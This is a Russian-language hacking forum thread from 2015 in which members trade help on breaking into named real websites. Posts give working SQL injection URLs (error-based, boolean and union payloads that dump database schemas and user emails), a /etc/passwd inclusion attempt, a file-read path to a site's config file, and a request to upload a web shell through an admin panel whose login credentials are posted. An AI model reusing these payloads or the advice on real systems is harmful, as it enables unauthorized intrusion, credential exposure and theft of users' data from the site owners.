Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
    Там parameter length constraint mechanism. Как обойти для вывода?
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    чтобы не мучаться с этим, есть еще post sqli в форме входа
    http://hollywoodnewswire.net/scripts/login.php

    тогда вспоминайте, мне данные способы неизвестны.
     
    _________________________
    #23742 yarbabin, 2 Jan 2015
    Last edited: 2 Jan 2015
    1 person likes this.
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    Брут!
     
    _________________________
  4. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
     
  5. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    220
    Likes Received:
    41
    Reputations:
    3
    Есть запрос "
    Code:
    /ru/users/?brands%5B%5D=9+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cusers.email%2C0x27%2C0x7e%29+from+%60dbname%60.users+Order+by+id+limit+4%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
    выводит:
    Code:
    Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row' in /
    куда копать?
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    group_concat(users.email)

    error-based. однако, там тоже запрос режется, нужно узнать версию и выбрать самый короткий вектор
    https://rdot.org/forum/showthread.php?t=325

    например:
    [​IMG]
    Code:
    XPATH syntax error: '.73-log5.1.73-log'
     
    _________________________
    #23746 yarbabin, 3 Jan 2015
    Last edited: 3 Jan 2015
  7. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Так какой же вектор применим к этому случаю?

    Code:
    xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html
    Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?
     
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'

    не получается найти нужное направление, error based не помогает, что то можно придумать?


    HTML:
    http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
    не выдает ошибки
     
    #23748 Br@!ns, 3 Jan 2015
    Last edited: 3 Jan 2015
  9. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    116
    Likes Received:
    27
    Reputations:
    26
    этож Magento, а какой скуле может быть речь? :D
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    Code:
    http://www.wyrgorod.ru/shop/subcategory_10000000%27+union+select+version%28%29--+_0.html
     
    _________________________
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,786
    Likes Received:
    808
    Reputations:
    851
    Конечно это так. Я вообще хрен знает, что делаю на этом форуме. Сижу, фигнёй страдаю.

    Boolean Based

    http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=5+--+_0.html TRUE

    http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=4+--+_0.html FALSE

    Union Based

    http://www.wyrgorod.ru/shop/subcategory_10'and(1)=2+union+select+@@version+--+_0.html

    Хватит вариантов?
     
    _________________________
    1 person likes this.
  12. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Всем привет! Не могу залить шелл на сайт, через форму заливки я загружаю шелл.. пишет "Файл успешно загружен" но шелла на сайте так и нет.
    Code:
    http://hts.kharkov.ua/admin/update_graph.php 
    Email: reddd14@mail.ru 
    Password: 55755575
    Помимо этой админки есть ещё и другая
    Code:
    http://hts.kharkov.ua/admin.php
    г-н winstrool сказал, что пароль может быть спрятан "в локальной читалке" но я уже все архивы по перекачивал, старицы по пересматривал и сканером ArxScanSite 3.0 прошёлся, но увы. Помогите с заливкой шелла!
     
    #23752 Unknowhacker, 10 Jan 2015
    Last edited: 10 Jan 2015
  13. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    Select schema_name from information_schema.schemata
    для MsSQL выводит список всех dbs. Как дальше через infromation_schema вывести таблицы и колонки другой базы данных?
    Select table_name from information_schema.tables where...
    а как связать со schema_name?
     
  14. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    select table_name from information_schema.tables where table_schema='information_schema' , где 'information_schema' - нужная бд. если фильтрует кавычки, то select table_name from information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D61
     
    #23754 Br@!ns, 10 Jan 2015
    Last edited: 10 Jan 2015
  15. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    125
    Likes Received:
    5
    Reputations:
    1
    подскажите,есть ли тут инклюд? сколько не набираю ../ всё равно одно и тоже http://www.xn--brliner-kseblatt-vnbi.de/?site=regional&land=DE&bl=/etc/passwd
     
  16. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    да-да, я так и делала,в идно нет прав на чтение других бд :(
    Object reference not set to an instance of an object
     
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Вот тебе БД.. выбирай любую. Но залить шелл не получится
    Code:
    http://www.hts.kharkov.ua/news_full.php?id=1%27+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,2,3+--+
     
    1 person likes this.
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    нет. ошибка внутри. кстати, там есть несколько sqli
    также, читалка файлов через fread():
    Code:
    http://www.bärliner-käseblatt.de/?site=startseite&lang=lol
    конфиг :) /www/htdocs/w00b2ffe/anzeiger/config/config.php
     
    _________________________
    #23758 yarbabin, 11 Jan 2015
    Last edited: 11 Jan 2015
  19. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    125
    Likes Received:
    5
    Reputations:
    1
    спасибо,про sqli я видела,интересней было бы мини шелл получить))
     
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    Есть ли тут sql?
    на кавычку реагирует, но ничего дальше сделать не выходит
     
Loading...
Thread Status:
Not open for further replies.